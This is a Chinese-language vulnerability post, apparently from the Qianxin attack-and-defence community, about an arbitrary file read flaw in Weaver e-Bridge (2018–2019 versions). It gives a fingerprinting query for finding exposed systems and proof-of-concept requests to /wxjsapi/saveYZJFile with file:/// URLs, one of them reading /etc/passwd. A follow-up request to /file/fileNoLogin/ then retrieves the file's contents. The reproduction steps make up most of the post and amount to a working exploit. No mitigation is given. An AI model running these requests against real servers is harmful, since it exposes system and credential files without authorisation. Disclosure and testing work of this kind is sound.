奇安信攻防社区-WeaverOA E-Bridge saveYZJFile 任意文件读取漏洞

# WeaverOA E-Bridge saveYZJFile 任意文件读取漏洞 ## 漏洞描述 Weaver云桥（e-Bridge）是上海Weaver公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集...

WeaverOA E-Bridge saveYZJFile 任意文件读取漏洞
======================================

漏洞描述
----

Weaver云桥（e-Bridge）是上海Weaver公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。Weaver云桥存在任意文件读取漏洞，攻击者成功利用该漏洞，可实现任意文件读取，获取敏感信息。

影响版本
----

Weaver云桥 e-Bridge 2018-2019 多个版本

网络测绘
----

title="Weaver云桥e-Bridge"

漏洞复现
----

```php
# Windows验证POC

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt
```

![img](https://shs3.b.qianxin.com/butian_public/f625154109864f1864f06f04948cab7ffd47eaec0d23e.jpg)

成功返回 `id值`,说明含有此漏洞

调用查看文件接口访问 /file/fileNoLogin/id值

![img](https://shs3.b.qianxin.com/butian_public/f7138754af0ed0d76d31a5019776eb9d958cb451d0e99.jpg)

```php
# Linux验证POC

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
```

![img](https://shs3.b.qianxin.com/butian_public/f231901ffb39602639398d7c0d657a3199e4534727350.jpg)

成功返回 `id值`,说明含有此漏洞

调用查看文件接口访问 `/file/fileNoLogin/id值`

![img](https://shs3.b.qianxin.com/butian_public/f403692d971df949e0eabb38dc3072ff8161956d1fb62.jpg)

0 条评论